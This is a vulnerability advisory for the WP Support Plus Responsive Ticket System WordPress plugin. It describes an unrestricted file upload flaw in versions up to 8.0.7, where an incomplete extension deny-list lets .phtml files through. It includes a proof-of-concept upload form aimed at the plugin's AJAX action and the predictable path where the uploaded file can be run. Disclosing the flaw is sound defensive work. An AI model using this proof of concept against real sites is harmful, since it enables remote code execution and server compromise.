WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution

2017-11-12T00:00:00
ID WPEX-ID:85D3126A-34A3-4799-A94B-76D7B835DB5F
Type wpexploit
Reporter Robert Mathews
Modified 2020-09-22T08:34:37

Description

WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms. This is because "includes/admin/attachment/uploadAttachment.php" contains this code: switch ($extension){ case 'exe': case 'php': case 'js': $isError=true; $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system'); But it does not check for other extensions like ".phtml". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains. Plugin author notified 2017-11-09.

                                        
                                            &lt;form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php"&gt;
    &lt;input type="hidden" name="action" value="wpsp_upload_attachment"&gt;
    Choose a file ending with .phtml:
    &lt;input type="file" name="0"&gt;
    &lt;input type="submit" value="Submit"&gt;
&lt;/form&gt;

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml